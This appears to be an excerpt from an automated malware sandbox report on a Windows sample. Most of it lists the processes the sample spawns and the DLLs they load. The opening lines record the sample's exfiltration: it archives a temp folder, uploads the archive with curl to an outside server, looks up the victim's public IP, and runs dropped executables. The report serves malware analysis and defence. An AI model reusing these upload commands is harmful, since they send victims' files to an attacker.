                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\asm\COMSurrogate.exe "C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s https://api.ipify.org
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
